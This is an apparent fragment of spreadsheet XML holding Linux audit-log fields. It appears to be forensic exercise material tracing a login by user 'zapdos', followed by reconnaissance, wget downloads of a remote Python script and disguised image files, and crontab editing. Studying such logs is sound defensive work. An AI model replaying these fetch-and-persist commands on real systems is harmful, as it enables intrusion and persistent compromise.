    <t>name="/usr/bin/expr"</t>
  </si>
  <si>
    <t>inode=1442069</t>
  </si>
  <si>
    <t>pid=2338</t>
  </si>
  <si>
    <t>comm="95-hwe-eol" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/95-hwe-eol"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/95-hwe-eol" inode=2361844</t>
  </si>
  <si>
    <t>a0=55d2de1a2348</t>
  </si>
  <si>
    <t>a1=55d2de1a2398</t>
  </si>
  <si>
    <t>a2=55d2de1a23a8</t>
  </si>
  <si>
    <t>a3=55d2de1a2010</t>
  </si>
  <si>
    <t>comm="update-motd-hwe" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="-e" a2="/usr/lib/update-notifier/update-motd-hwe-eol"</t>
  </si>
  <si>
    <t>name="/usr/lib/update-notifier/update-motd-hwe-eol" inode=1451016</t>
  </si>
  <si>
    <t>a0=55a2e9fccba0</t>
  </si>
  <si>
    <t>a1=55a2e9fccb60</t>
  </si>
  <si>
    <t>a2=55a2e9fccb88</t>
  </si>
  <si>
    <t>a3=55a2e9fcc010</t>
  </si>
  <si>
    <t>ppid=2338</t>
  </si>
  <si>
    <t>pid=2339</t>
  </si>
  <si>
    <t>comm="apt-config" exe="/usr/bin/apt-config" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="apt-config" a1="shell"</t>
  </si>
  <si>
    <t>a2="StateDir"</t>
  </si>
  <si>
    <t>a3="Dir::State"</t>
  </si>
  <si>
    <t>name="/usr/bin/apt-config" inode=1441849</t>
  </si>
  <si>
    <t>a0=55f9a55e1270</t>
  </si>
  <si>
    <t>a1=55f9a55ecd30</t>
  </si>
  <si>
    <t>a2=7ffd5b4eb9b0</t>
  </si>
  <si>
    <t>a3=2</t>
  </si>
  <si>
    <t>ppid=2339</t>
  </si>
  <si>
    <t>pid=2340</t>
  </si>
  <si>
    <t>comm="dpkg"</t>
  </si>
  <si>
    <t>exe="/usr/bin/dpkg"</t>
  </si>
  <si>
    <t>key="software_mgmt"</t>
  </si>
  <si>
    <t>a0="/usr/bin/dpkg"</t>
  </si>
  <si>
    <t>a1="--print-foreign-architectures"</t>
  </si>
  <si>
    <t>name="/usr/bin/dpkg"</t>
  </si>
  <si>
    <t>inode=1442032</t>
  </si>
  <si>
    <t>a3=7f0b92030810</t>
  </si>
  <si>
    <t>pid=2341</t>
  </si>
  <si>
    <t>a2="ListDir"</t>
  </si>
  <si>
    <t>a3="Dir::State::Lists"</t>
  </si>
  <si>
    <t>a0=55ba1f246270</t>
  </si>
  <si>
    <t>a1=55ba1f251d30</t>
  </si>
  <si>
    <t>a2=7fff6262c2a0</t>
  </si>
  <si>
    <t>ppid=2341</t>
  </si>
  <si>
    <t>pid=2342</t>
  </si>
  <si>
    <t>a0=55a2e9fccbb0</t>
  </si>
  <si>
    <t>a1=55a2e9fccb70</t>
  </si>
  <si>
    <t>a2=55a2e9fccb98</t>
  </si>
  <si>
    <t>pid=2343</t>
  </si>
  <si>
    <t>a2="DpkgStatus"</t>
  </si>
  <si>
    <t>a3="Dir::State::status"</t>
  </si>
  <si>
    <t>a0=557893386270</t>
  </si>
  <si>
    <t>a1=557893391d30</t>
  </si>
  <si>
    <t>a2=7fffe79f6110</t>
  </si>
  <si>
    <t>ppid=2343</t>
  </si>
  <si>
    <t>pid=2344</t>
  </si>
  <si>
    <t>pid=2345</t>
  </si>
  <si>
    <t>a2="EtcDir"</t>
  </si>
  <si>
    <t>a3="Dir::Etc"</t>
  </si>
  <si>
    <t>a0=561918a64270</t>
  </si>
  <si>
    <t>a1=561918a6fd30</t>
  </si>
  <si>
    <t>a2=7ffdb0a286c0</t>
  </si>
  <si>
    <t>ppid=2345</t>
  </si>
  <si>
    <t>pid=2346</t>
  </si>
  <si>
    <t>pid=2347</t>
  </si>
  <si>
    <t>a2="SourceList"</t>
  </si>
  <si>
    <t>a3="Dir::Etc::sourcelist"</t>
  </si>
  <si>
    <t>a0=5555ed98e270</t>
  </si>
  <si>
    <t>a1=5555ed999d30</t>
  </si>
  <si>
    <t>a2=7fff5313fad0</t>
  </si>
  <si>
    <t>ppid=2347</t>
  </si>
  <si>
    <t>pid=2348</t>
  </si>
  <si>
    <t>a0=55a2e9fcd0d8</t>
  </si>
  <si>
    <t>a1=55a2e9fcd068</t>
  </si>
  <si>
    <t>a2=55a2e9fcd0c0</t>
  </si>
  <si>
    <t>pid=2349</t>
  </si>
  <si>
    <t>comm="find"</t>
  </si>
  <si>
    <t>exe="/usr/bin/find"</t>
  </si>
  <si>
    <t>argc=10</t>
  </si>
  <si>
    <t>a0="find"</t>
  </si>
  <si>
    <t>a1="/var/lib/apt/lists/"</t>
  </si>
  <si>
    <t>a2="/etc/apt/sources.list" a3="//var/lib/dpkg/status"</t>
  </si>
  <si>
    <t>a4="-type" a5="f"</t>
  </si>
  <si>
    <t>a6="-newer" a7="/var/lib/update-notifier/hwe-eol" a8="-print" a9="-quit"</t>
  </si>
  <si>
    <t>name="/usr/bin/find"</t>
  </si>
  <si>
    <t>inode=1442087</t>
  </si>
  <si>
    <t>a0=55a2e9fccbd0</t>
  </si>
  <si>
    <t>a1=55a2e9fccba0</t>
  </si>
  <si>
    <t>a2=55a2e9fccbb8</t>
  </si>
  <si>
    <t>ppid=2352</t>
  </si>
  <si>
    <t>pid=2353</t>
  </si>
  <si>
    <t>comm="dirname"</t>
  </si>
  <si>
    <t>exe="/usr/bin/dirname"</t>
  </si>
  <si>
    <t>a0="dirname"</t>
  </si>
  <si>
    <t>a1="/var/lib/update-notifier/hwe-eol"</t>
  </si>
  <si>
    <t>name="/usr/bin/dirname"</t>
  </si>
  <si>
    <t>inode=1442026</t>
  </si>
  <si>
    <t>a0=55a2e9fccbc8</t>
  </si>
  <si>
    <t>a1=55a2e9fccb90</t>
  </si>
  <si>
    <t>a2=55a2e9fccbb0</t>
  </si>
  <si>
    <t>pid=2352</t>
  </si>
  <si>
    <t>comm="mktemp"</t>
  </si>
  <si>
    <t>exe="/bin/mktemp"</t>
  </si>
  <si>
    <t>a0="mktemp"</t>
  </si>
  <si>
    <t>a1="-p" a2="/var/lib/update-notifier"</t>
  </si>
  <si>
    <t>name="/bin/mktemp"</t>
  </si>
  <si>
    <t>inode=2228314</t>
  </si>
  <si>
    <t>a0=55a2e8ff1bb0</t>
  </si>
  <si>
    <t>a1=55a2e8ff1b80</t>
  </si>
  <si>
    <t>a2=55a2e8ff1b98</t>
  </si>
  <si>
    <t>pid=2354</t>
  </si>
  <si>
    <t>a0=55a2e8ff1bd0</t>
  </si>
  <si>
    <t>a1=55a2e8ff1b98</t>
  </si>
  <si>
    <t>a2=55a2e8ff1bb8</t>
  </si>
  <si>
    <t>pid=2355</t>
  </si>
  <si>
    <t>comm="rm"</t>
  </si>
  <si>
    <t>exe="/bin/rm"</t>
  </si>
  <si>
    <t>a0="rm"</t>
  </si>
  <si>
    <t>a1="-f" a2="/var/lib/update-notifier/tmp.5z3PiePIan"</t>
  </si>
  <si>
    <t>name="/bin/rm"</t>
  </si>
  <si>
    <t>inode=2228364</t>
  </si>
  <si>
    <t>pid=2356</t>
  </si>
  <si>
    <t>comm="98-fsck-at-rebo" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/98-fsck-at-reboot"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/98-fsck-at-reboot" inode=2361845</t>
  </si>
  <si>
    <t>a0=55afb3b54348</t>
  </si>
  <si>
    <t>a1=55afb3b543a0</t>
  </si>
  <si>
    <t>a2=55afb3b543b0</t>
  </si>
  <si>
    <t>a3=55afb3b54010</t>
  </si>
  <si>
    <t>comm="update-motd-fsc" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/usr/lib/update-notifier/update-motd-fsck-at-reboot"</t>
  </si>
  <si>
    <t>name="/usr/lib/update-notifier/update-motd-fsck-at-reboot" inode=1451015</t>
  </si>
  <si>
    <t>a0=5586610ab4f8</t>
  </si>
  <si>
    <t>a1=5586610ab4b8</t>
  </si>
  <si>
    <t>a2=5586610ab4e0</t>
  </si>
  <si>
    <t>a3=55865f74c962</t>
  </si>
  <si>
    <t>ppid=2356</t>
  </si>
  <si>
    <t>pid=2357</t>
  </si>
  <si>
    <t>a1="-c" a2="%Y" a3="/var/lib/update-notifier/fsck-at-reboot"</t>
  </si>
  <si>
    <t>a0=5586610ab458</t>
  </si>
  <si>
    <t>a1=5586610ab420</t>
  </si>
  <si>
    <t>a2=5586610ab440</t>
  </si>
  <si>
    <t>a3=5586610ab010</t>
  </si>
  <si>
    <t>ppid=2358</t>
  </si>
  <si>
    <t>pid=2359</t>
  </si>
  <si>
    <t>comm="awk"</t>
  </si>
  <si>
    <t>exe="/usr/bin/mawk"</t>
  </si>
  <si>
    <t>a0="awk"</t>
  </si>
  <si>
    <t>a1=7B7072696E742024317D</t>
  </si>
  <si>
    <t>a2="/proc/uptime"</t>
  </si>
  <si>
    <t>name="/usr/bin/awk"</t>
  </si>
  <si>
    <t>inode=1442479</t>
  </si>
  <si>
    <t>a0=5586610ab448</t>
  </si>
  <si>
    <t>a1=5586610ab408</t>
  </si>
  <si>
    <t>a2=5586610ab430</t>
  </si>
  <si>
    <t>a3=5586610ab650</t>
  </si>
  <si>
    <t>pid=2358</t>
  </si>
  <si>
    <t>a1="-d" a2=6E6F77202D20313237382E3032207365636F6E6473</t>
  </si>
  <si>
    <t>a3="+%s"</t>
  </si>
  <si>
    <t>a0=55865f954bf0</t>
  </si>
  <si>
    <t>a1=55865f954bc0</t>
  </si>
  <si>
    <t>a2=55865f954bd8</t>
  </si>
  <si>
    <t>pid=2360</t>
  </si>
  <si>
    <t>a0=5586610ae098</t>
  </si>
  <si>
    <t>a1=5586610ae068</t>
  </si>
  <si>
    <t>a2=5586610ae080</t>
  </si>
  <si>
    <t>ppid=2361</t>
  </si>
  <si>
    <t>pid=2363</t>
  </si>
  <si>
    <t>a1=2435207E202F5E65787428327C337C3429242F207B207072696E74202431207D</t>
  </si>
  <si>
    <t>a0=5586610ae058</t>
  </si>
  <si>
    <t>a1=5586610ae030</t>
  </si>
  <si>
    <t>a2=5586610ae040</t>
  </si>
  <si>
    <t>pid=2362</t>
  </si>
  <si>
    <t>comm="mount"</t>
  </si>
  <si>
    <t>exe="/bin/mount"</t>
  </si>
  <si>
    <t>a0="mount"</t>
  </si>
  <si>
    <t>name="/bin/mount"</t>
  </si>
  <si>
    <t>inode=2228316</t>
  </si>
  <si>
    <t>dev=08:01 mode=0104755</t>
  </si>
  <si>
    <t>a0=5586610ae0e8</t>
  </si>
  <si>
    <t>a1=5586610ae090</t>
  </si>
  <si>
    <t>a2=5586610ae0d0</t>
  </si>
  <si>
    <t>pid=2364</t>
  </si>
  <si>
    <t>comm="dumpe2fs"</t>
  </si>
  <si>
    <t>exe="/sbin/dumpe2fs"</t>
  </si>
  <si>
    <t>a0="dumpe2fs"</t>
  </si>
  <si>
    <t>a1="-h" a2="/dev/sda1"</t>
  </si>
  <si>
    <t>name="/sbin/dumpe2fs"</t>
  </si>
  <si>
    <t>inode=917540</t>
  </si>
  <si>
    <t>a0=5586610ae0d8</t>
  </si>
  <si>
    <t>a1=5586610ae098</t>
  </si>
  <si>
    <t>a2=5586610ae0c0</t>
  </si>
  <si>
    <t>ppid=2365</t>
  </si>
  <si>
    <t>pid=2368</t>
  </si>
  <si>
    <t>a1="-d:" a2="-f" a3="2-"</t>
  </si>
  <si>
    <t>a0=5586610ae0a8</t>
  </si>
  <si>
    <t>a1=5586610ae078</t>
  </si>
  <si>
    <t>a2=5586610ae090</t>
  </si>
  <si>
    <t>pid=2367</t>
  </si>
  <si>
    <t>a1=5E4D6F756E7420636F756E743A</t>
  </si>
  <si>
    <t>ppid=2369</t>
  </si>
  <si>
    <t>pid=2372</t>
  </si>
  <si>
    <t>a0=5586610ae0b0</t>
  </si>
  <si>
    <t>a1=5586610ae080</t>
  </si>
  <si>
    <t>a2=5586610ae098</t>
  </si>
  <si>
    <t>pid=2371</t>
  </si>
  <si>
    <t>a1=5E4D6178696D756D206D6F756E7420636F756E743A</t>
  </si>
  <si>
    <t>ppid=2373</t>
  </si>
  <si>
    <t>pid=2377</t>
  </si>
  <si>
    <t>pid=2376</t>
  </si>
  <si>
    <t>a1="-d(" a2="-f" a3="1"</t>
  </si>
  <si>
    <t>pid=2375</t>
  </si>
  <si>
    <t>a1=5E436865636B20696E74657276616C3A</t>
  </si>
  <si>
    <t>ppid=2378</t>
  </si>
  <si>
    <t>pid=2381</t>
  </si>
  <si>
    <t>pid=2380</t>
  </si>
  <si>
    <t>a1=5E4E65787420636865636B2061667465723A</t>
  </si>
  <si>
    <t>a0=5586610ae0e0</t>
  </si>
  <si>
    <t>a1=5586610ae0a0</t>
  </si>
  <si>
    <t>a2=5586610ae0c8</t>
  </si>
  <si>
    <t>a3=5586610ae3b0</t>
  </si>
  <si>
    <t>pid=2382</t>
  </si>
  <si>
    <t>a1="-d" a2=""</t>
  </si>
  <si>
    <t>a0=55865f954ba8</t>
  </si>
  <si>
    <t>a1=55865f954b78</t>
  </si>
  <si>
    <t>a2=55865f954b90</t>
  </si>
  <si>
    <t>a3=7f708d9e5810</t>
  </si>
  <si>
    <t>pid=2383</t>
  </si>
  <si>
    <t>a1="/var/lib/update-notifier/fsck-at-reboot"</t>
  </si>
  <si>
    <t>pid=2384</t>
  </si>
  <si>
    <t>comm="98-reboot-requi" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/98-reboot-required"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/98-reboot-required" inode=2361846</t>
  </si>
  <si>
    <t>a0=562339388348</t>
  </si>
  <si>
    <t>a1=5623393883a0</t>
  </si>
  <si>
    <t>a2=5623393883b0</t>
  </si>
  <si>
    <t>a3=562339388010</t>
  </si>
  <si>
    <t>comm="update-motd-reb" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="-e" a2="/usr/lib/update-notifier/update-motd-reboot-required"</t>
  </si>
  <si>
    <t>name="/usr/lib/update-notifier/update-motd-reboot-required" inode=1451017</t>
  </si>
  <si>
    <t>msg='op=PAM:session_open acct="zapdos"</t>
  </si>
  <si>
    <t>pid=2385</t>
  </si>
  <si>
    <t>syscall=92</t>
  </si>
  <si>
    <t>a0=5649771bf34c</t>
  </si>
  <si>
    <t>a1=3e8</t>
  </si>
  <si>
    <t>a2=5</t>
  </si>
  <si>
    <t>a3=7f377c59dcc0</t>
  </si>
  <si>
    <t>key="perm_mod"</t>
  </si>
  <si>
    <t>name="/dev/pts/3"</t>
  </si>
  <si>
    <t>inode=6</t>
  </si>
  <si>
    <t>dev=00:16 mode=020620</t>
  </si>
  <si>
    <t>ogid=5</t>
  </si>
  <si>
    <t>rdev=88:03 nametype=NORMAL</t>
  </si>
  <si>
    <t>exit=10</t>
  </si>
  <si>
    <t>a1=7f377c5b9f20</t>
  </si>
  <si>
    <t>a2=80002</t>
  </si>
  <si>
    <t>name="/var/run/utmp"</t>
  </si>
  <si>
    <t>inode=594</t>
  </si>
  <si>
    <t>dev=00:17 mode=0100664</t>
  </si>
  <si>
    <t>exit=9</t>
  </si>
  <si>
    <t>a1=7f377d36b959</t>
  </si>
  <si>
    <t>a2=1</t>
  </si>
  <si>
    <t>name="/var/log/wtmp"</t>
  </si>
  <si>
    <t>inode=2101636</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100664</t>
  </si>
  <si>
    <t>a1=7fff28eb7810</t>
  </si>
  <si>
    <t>a2=42</t>
  </si>
  <si>
    <t>a3=180</t>
  </si>
  <si>
    <t>key="login"</t>
  </si>
  <si>
    <t>name="/var/log/"</t>
  </si>
  <si>
    <t>inode=2101343</t>
  </si>
  <si>
    <t>dev=08:01 mode=040775</t>
  </si>
  <si>
    <t>ogid=106</t>
  </si>
  <si>
    <t>name="/var/log/lastlog"</t>
  </si>
  <si>
    <t>inode=2101634</t>
  </si>
  <si>
    <t>id=1000</t>
  </si>
  <si>
    <t>hostname=192.168.0.102 addr=192.168.0.102 terminal=/dev/pts/3</t>
  </si>
  <si>
    <t>a0=5591d8701dd0</t>
  </si>
  <si>
    <t>a2=3e8</t>
  </si>
  <si>
    <t>a3=5591d86f5010</t>
  </si>
  <si>
    <t>ppid=2385</t>
  </si>
  <si>
    <t>pid=2386</t>
  </si>
  <si>
    <t>uid=1000</t>
  </si>
  <si>
    <t>gid=1000</t>
  </si>
  <si>
    <t>euid=1000</t>
  </si>
  <si>
    <t>suid=1000</t>
  </si>
  <si>
    <t>fsuid=1000</t>
  </si>
  <si>
    <t>egid=1000</t>
  </si>
  <si>
    <t>sgid=1000</t>
  </si>
  <si>
    <t>fsgid=1000</t>
  </si>
  <si>
    <t>tty=pts3</t>
  </si>
  <si>
    <t>comm="bash"</t>
  </si>
  <si>
    <t>exe="/bin/bash"</t>
  </si>
  <si>
    <t>name="/home/zapdos/.bash_history" inode=2631322</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100600</t>
  </si>
  <si>
    <t>ouid=1000</t>
  </si>
  <si>
    <t>ogid=1000</t>
  </si>
  <si>
    <t>a0=5591d8702d80</t>
  </si>
  <si>
    <t>exit=8</t>
  </si>
  <si>
    <t>a1=55bf846f856b</t>
  </si>
  <si>
    <t>pid=809</t>
  </si>
  <si>
    <t>comm="accounts-daemon" exe="/usr/lib/accountsservice/accounts-daemon" key="etcpasswd"</t>
  </si>
  <si>
    <t>a1=7ff1c5d762a3</t>
  </si>
  <si>
    <t>a0=5591d87e79c0</t>
  </si>
  <si>
    <t>a1=5591d87fbc80</t>
  </si>
  <si>
    <t>a2=5591d8712cb0</t>
  </si>
  <si>
    <t>ppid=2386</t>
  </si>
  <si>
    <t>pid=2447</t>
  </si>
  <si>
    <t>comm="whoami"</t>
  </si>
  <si>
    <t>exe="/usr/bin/whoami"</t>
  </si>
  <si>
    <t>key="recon"</t>
  </si>
  <si>
    <t>a0="whoami"</t>
  </si>
  <si>
    <t>name="/usr/bin/whoami"</t>
  </si>
  <si>
    <t>inode=1443209</t>
  </si>
  <si>
    <t>a0=5591d87cafc0</t>
  </si>
  <si>
    <t>a1=5591d87d0c70</t>
  </si>
  <si>
    <t>pid=2478</t>
  </si>
  <si>
    <t>a0=5591d870d840</t>
  </si>
  <si>
    <t>a1=5591d8800b30</t>
  </si>
  <si>
    <t>pid=2540</t>
  </si>
  <si>
    <t>comm="wget"</t>
  </si>
  <si>
    <t>exe="/usr/bin/wget"</t>
  </si>
  <si>
    <t>key="susp_activity"</t>
  </si>
  <si>
    <t>a0="wget"</t>
  </si>
  <si>
    <t>a1="https://raw.githubusercontent.com/yohdeepsnow/pythonfordummies/master/main.py" a2="-o" a3="script.py"</t>
  </si>
  <si>
    <t>name="/usr/bin/wget"</t>
  </si>
  <si>
    <t>inode=1443204</t>
  </si>
  <si>
    <t>a0=5591c53d0df0</t>
  </si>
  <si>
    <t>a1=5591c53a9700</t>
  </si>
  <si>
    <t>a2=5591c53a9220</t>
  </si>
  <si>
    <t>a3=5591c5395010</t>
  </si>
  <si>
    <t>ppid=2175</t>
  </si>
  <si>
    <t>pid=2608</t>
  </si>
  <si>
    <t>tty=pts2</t>
  </si>
  <si>
    <t>a0=5591c53a97a0</t>
  </si>
  <si>
    <t>a1=5591c53d1a70</t>
  </si>
  <si>
    <t>pid=2647</t>
  </si>
  <si>
    <t>egid=105</t>
  </si>
  <si>
    <t>sgid=105</t>
  </si>
  <si>
    <t>fsgid=105</t>
  </si>
  <si>
    <t>comm="crontab"</t>
  </si>
  <si>
    <t>exe="/usr/bin/crontab"</t>
  </si>
  <si>
    <t>a0="crontab"</t>
  </si>
  <si>
    <t>a1="-e"</t>
  </si>
  <si>
    <t>name="/usr/bin/crontab"</t>
  </si>
  <si>
    <t>inode=1441978</t>
  </si>
  <si>
    <t>dev=08:01 mode=0102755</t>
  </si>
  <si>
    <t>ogid=105</t>
  </si>
  <si>
    <t>a0=5617d0c93927</t>
  </si>
  <si>
    <t>a1=7ffdda878380</t>
  </si>
  <si>
    <t>a2=7ffdda878c30</t>
  </si>
  <si>
    <t>a3=1</t>
  </si>
  <si>
    <t>ppid=2647</t>
  </si>
  <si>
    <t>pid=2648</t>
  </si>
  <si>
    <t>a1="-c" a2=2F7573722F62696E2F73656E7369626C652D656469746F72202F746D702F63726F6E7461622E58476634304C2F63726F6E746162</t>
  </si>
  <si>
    <t>a0=561be50aab48</t>
  </si>
  <si>
    <t>a1=561be50aabb0</t>
  </si>
  <si>
    <t>a2=561be50aabc8</t>
  </si>
  <si>
    <t>a3=7f130da64810</t>
  </si>
  <si>
    <t>ppid=2648</t>
  </si>
  <si>
    <t>pid=2649</t>
  </si>
  <si>
    <t>comm="sensible-editor" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/usr/bin/sensible-editor" a2="/tmp/crontab.XGf40L/crontab"</t>
  </si>
  <si>
    <t>name="/usr/bin/sensible-editor" inode=1442988</t>
  </si>
  <si>
    <t>a0=55d948e5d988</t>
  </si>
  <si>
    <t>a1=55d94788bbd0</t>
  </si>
  <si>
    <t>a2=55d948e5d8b8</t>
  </si>
  <si>
    <t>a3=55d948e5d010</t>
  </si>
  <si>
    <t>ppid=2649</t>
  </si>
  <si>
    <t>pid=2650</t>
  </si>
  <si>
    <t>comm="which"</t>
  </si>
  <si>
    <t>a1="/usr/bin/which"</t>
  </si>
  <si>
    <t>a2="sensible-editor"</t>
  </si>
  <si>
    <t>name="/usr/bin/which"</t>
  </si>
  <si>
    <t>inode=2228409</t>
  </si>
  <si>
    <t>a0=55d948e5da70</t>
  </si>
  <si>
    <t>a1=55d948e5d990</t>
  </si>
  <si>
    <t>a2=55d948e5d9a0</t>
  </si>
  <si>
    <t>a3=7f1d18394810</t>
  </si>
  <si>
    <t>ppid=2651</t>
  </si>
  <si>
    <t>pid=2652</t>
  </si>
  <si>
    <t>ppid=2653</t>
  </si>
  <si>
    <t>pid=2654</t>
  </si>
  <si>
    <t>a0=55d948e5da90</t>
  </si>
  <si>
    <t>a1=55d948e5d9b0</t>
  </si>
  <si>
    <t>a2=55d948e5d9c0</t>
  </si>
  <si>
    <t>ppid=2655</t>
  </si>
  <si>
    <t>pid=2656</t>
  </si>
  <si>
    <t>a0=55d948e5def0</t>
  </si>
  <si>
    <t>a1=55d948e5de10</t>
  </si>
  <si>
    <t>a2=55d948e5de20</t>
  </si>
  <si>
    <t>pid=2657</t>
  </si>
  <si>
    <t>comm="select-editor" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/usr/bin/select-editor"</t>
  </si>
  <si>
    <t>name="/usr/bin/select-editor" inode=1442986</t>
  </si>
  <si>
    <t>a0=5623fde229f8</t>
  </si>
  <si>
    <t>a1=5623fc3fec00</t>
  </si>
  <si>
    <t>a2=5623fde22928</t>
  </si>
  <si>
    <t>a3=5623fde22010</t>
  </si>
  <si>
    <t>ppid=2657</t>
  </si>
  <si>
    <t>pid=2658</t>
  </si>
  <si>
    <t>comm="touch"</t>
  </si>
  <si>
    <t>exe="/bin/touch"</t>
  </si>
  <si>
    <t>a0="touch"</t>
  </si>
  <si>
    <t>a1="/root/.selected_editor"</t>
  </si>
  <si>
    <t>name="/usr/bin/touch"</t>
  </si>
  <si>
    <t>inode=2228397</t>
  </si>
  <si>
    <t>a0=5623fde22a50</t>
  </si>
  <si>
    <t>a1=5623fde22968</t>
  </si>
  <si>
    <t>a2=5623fde22980</t>
  </si>
  <si>
    <t>ppid=2659</t>
  </si>
  <si>
    <t>pid=2661</t>
  </si>
  <si>
    <t>comm="wc"</t>
  </si>
  <si>
    <t>exe="/usr/bin/wc"</t>
  </si>
  <si>
    <t>a0="wc"</t>
  </si>
  <si>
    <t>a1="-l"</t>
  </si>
  <si>
    <t>name="/usr/bin/wc"</t>
  </si>
  <si>
    <t>inode=1443203</t>
  </si>
  <si>
    <t>a0=5623fde22a78</t>
  </si>
  <si>
    <t>a1=5623fde22988</t>
  </si>
  <si>
    <t>a2=5623fde229a8</t>
  </si>
  <si>
    <t>pid=2660</t>
  </si>
  <si>
    <t>comm="update-alternat" exe="/usr/bin/update-alternatives" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="update-alternatives" a1="--list" a2="editor"</t>
  </si>
  <si>
    <t>name="/usr/bin/update-alternatives" inode=1443170</t>
  </si>
  <si>
    <t>a0=5623fde25228</t>
  </si>
  <si>
    <t>a1=5623fde25140</t>
  </si>
  <si>
    <t>a2=5623fde25158</t>
  </si>
  <si>
    <t>pid=2662</t>
  </si>
  <si>
    <t>comm="gettext"</t>
  </si>
  <si>
    <t>exe="/usr/bin/gettext"</t>
  </si>
  <si>
    <t>a0="gettext"</t>
  </si>
  <si>
    <t>a1=53656C65637420616E20656469746F722E2020546F206368616E6765206C617465722C2072756E</t>
  </si>
  <si>
    <t>name="/usr/bin/gettext"</t>
  </si>
  <si>
    <t>inode=1442154</t>
  </si>
  <si>
    <t>a0=5623fde25268</t>
  </si>
  <si>
    <t>a1=5623fde25170</t>
  </si>
  <si>
    <t>a2=5623fde25198</t>
  </si>
  <si>
    <t>ppid=2663</t>
  </si>
  <si>
    <t>pid=2667</t>
  </si>
  <si>
    <t>a0=5623fde25258</t>
  </si>
  <si>
    <t>a1=5623fde25168</t>
  </si>
  <si>
    <t>a2=5623fde25188</t>
  </si>
  <si>
    <t>pid=2664</t>
  </si>
  <si>
    <t>a0="update-alternatives" a1="--query" a2="editor"</t>
  </si>
  <si>
    <t>a0=5623fde25248</t>
  </si>
  <si>
    <t>a1=5623fde25158</t>
  </si>
  <si>
    <t>a2=5623fde25178</t>
  </si>
  <si>
    <t>pid=2666</t>
  </si>
  <si>
    <t>comm="sort"</t>
  </si>
  <si>
    <t>exe="/usr/bin/sort"</t>
  </si>
  <si>
    <t>a0="sort"</t>
  </si>
  <si>
    <t>a1="-n" a2="-r"</t>
  </si>
  <si>
    <t>name="/usr/bin/sort"</t>
  </si>
  <si>
    <t>inode=1443035</t>
  </si>
  <si>
    <t>a0=5623fde25280</t>
  </si>
  <si>
    <t>a1=5623fde25188</t>
  </si>
  <si>
    <t>a2=5623fde251b0</t>
  </si>
  <si>
    <t>pid=2668</t>
  </si>
  <si>
    <t>a1="0"</t>
  </si>
  <si>
    <t>a2="+" a3="1"</t>
  </si>
  <si>
    <t>pid=2669</t>
  </si>
  <si>
    <t>a1="easiest"</t>
  </si>
  <si>
    <t>a3=5623fc1f6962</t>
  </si>
  <si>
    <t>pid=2670</t>
  </si>
  <si>
    <t>a1="1"</t>
  </si>
  <si>
    <t>pid=2671</t>
  </si>
  <si>
    <t>a1="2"</t>
  </si>
  <si>
    <t>a0=5623fde25098</t>
  </si>
  <si>
    <t>a1=5623fde250c0</t>
  </si>
  <si>
    <t>a2=5623fde25138</t>
  </si>
  <si>
    <t>a3=7f41dcba2810</t>
  </si>
  <si>
    <t>pid=2672</t>
  </si>
  <si>
    <t>comm="true"</t>
  </si>
  <si>
    <t>exe="/bin/true"</t>
  </si>
  <si>
    <t>a0="/bin/true"</t>
  </si>
  <si>
    <t>name="/bin/true"</t>
  </si>
  <si>
    <t>inode=2228398</t>
  </si>
  <si>
    <t>pid=2673</t>
  </si>
  <si>
    <t>a1="Choose"</t>
  </si>
  <si>
    <t>pid=2688</t>
  </si>
  <si>
    <t>pid=2689</t>
  </si>
  <si>
    <t>a0=55d94788bb38</t>
  </si>
  <si>
    <t>a1=55d94788bb90</t>
  </si>
  <si>
    <t>a2=55d94788bba8</t>
  </si>
  <si>
    <t>pid=2690</t>
  </si>
  <si>
    <t>comm="nano"</t>
  </si>
  <si>
    <t>exe="/bin/nano"</t>
  </si>
  <si>
    <t>a0="/bin/nano"</t>
  </si>
  <si>
    <t>a1="/tmp/crontab.XGf40L/crontab"</t>
  </si>
  <si>
    <t>name="/bin/nano"</t>
  </si>
  <si>
    <t>inode=2228321</t>
  </si>
  <si>
    <t>syscall=93</t>
  </si>
  <si>
    <t>a0=24</t>
  </si>
  <si>
    <t>a3=1b6</t>
  </si>
  <si>
    <t>ppid=1444</t>
  </si>
  <si>
    <t>pid=1582</t>
  </si>
  <si>
    <t>tty=tty2</t>
  </si>
  <si>
    <t>ses=3</t>
  </si>
  <si>
    <t>comm="gnome-shell" exe="/usr/bin/gnome-shell" key="perm_mod"</t>
  </si>
  <si>
    <t>name=(null) inode=2631596</t>
  </si>
  <si>
    <t>syscall=91</t>
  </si>
  <si>
    <t>a1=81b4</t>
  </si>
  <si>
    <t>a0=5591d8705a90</t>
  </si>
  <si>
    <t>pid=2766</t>
  </si>
  <si>
    <t>a1="https://elcicko.com/wp-content/uploads/2019/10/instalasi-golang.png" a2="-O" a3="golang"</t>
  </si>
  <si>
    <t>a0=5591c53cfb00</t>
  </si>
  <si>
    <t>a1=5591c53d1a90</t>
  </si>
  <si>
    <t>pid=2795</t>
  </si>
  <si>
    <t>a0=5591d870ffc0</t>
  </si>
  <si>
    <t>pid=2806</t>
  </si>
  <si>
    <t>a1="https://raw.githubusercontent.com/yohdeepsnow/pythonfordummies/master/main.py" a2="-O" a3="script.py"</t>
  </si>
  <si>
    <t>a0=5591d87cdae0</t>
  </si>
  <si>
    <t>pid=2827</t>
  </si>
  <si>
    <t>a1="https://petircysec.com/wp-content/uploads/2019/11/1537984792995_resize.png" a2="-O" a3="tander.png"</t>
  </si>
  <si>
    <t>a0=5591d882e920</t>
  </si>
  <si>
    <t>a1=5591d8821d20</t>
  </si>
  <si>
    <t>ppid=2864</t>
  </si>
  <si>
    <t>pid=2866</t>
  </si>
  <si>
    <t>comm="base64"</t>
  </si>
  <si>
    <t>exe="/usr/bin/base64"</t>
  </si>
  <si>
    <t>a0="base64"</t>
  </si>
